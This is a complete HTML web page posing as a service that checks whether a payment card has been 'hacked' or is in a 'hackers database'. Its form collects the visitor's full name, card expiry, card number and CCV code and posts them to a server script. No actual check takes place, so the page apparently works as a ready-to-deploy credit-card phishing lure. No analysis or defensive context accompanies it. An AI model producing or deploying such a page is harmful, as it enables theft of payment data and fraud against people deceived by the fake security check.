<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Has your card been hacked?</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f5f5f5;
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            align-items: center;
        }
        header {
            background-color: #4CAF50;
            color: white;
            padding: 1rem;
            width: 100%;
            text-align: center;
        }
        .container {
            background-color: white;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            padding: 2rem;
            margin: 2rem;
            max-width: 400px;
            width: 100%;
        }
        h1 {
            font-size: 1.5rem;
            margin-bottom: 1rem;
        }
        form {
            display: flex;
            flex-direction: column;
        }
        label {
            margin-bottom: 0.5rem;
            font-weight: bold;
        }
        input[type="text"], input[type="submit"] {
            margin-bottom: 1rem;
            padding: 0.5rem;
            font-size: 1rem;
            border-radius: 5px;
            border: 1px solid #ccc;
            width: calc(100% - 1rem);
        }
        input[type="submit"] {
            background-color: #4CAF50;
            color: white;
            cursor: pointer;
            border: none;
            transition: background-color 0.3s;
        }
        input[type="submit"]:hover {
            background-color: #45a049;
        }
        footer {
            text-align: center;
            margin: 1rem 0;
        }
    </style>
</head>
<body>
    <header>
        <h1>Has your card been hacked? Is it in the hackers database? Find out below!</h1>
    </header>
    <div class="container">
        <form action="/post.php" method="POST">
            <label for="name">Full name</label>
            <input type="text" id="name" name="name">

            <label for="exp">Card expiry</label>
            <input type="text" id="exp" name="exp">

            <label for="ccnumber">Credit card number</label>
            <input type="text" id="ccnumber" name="ccnumber">

            <label for="ccv">CCV code</label>
            <input type="text" id="ccv" name="ccv">

            <input type="submit" value="Check it!">
        </form>
    </div>
    <footer>
        <p>&copy; 2024</p>
    </footer>
</body>
</html>
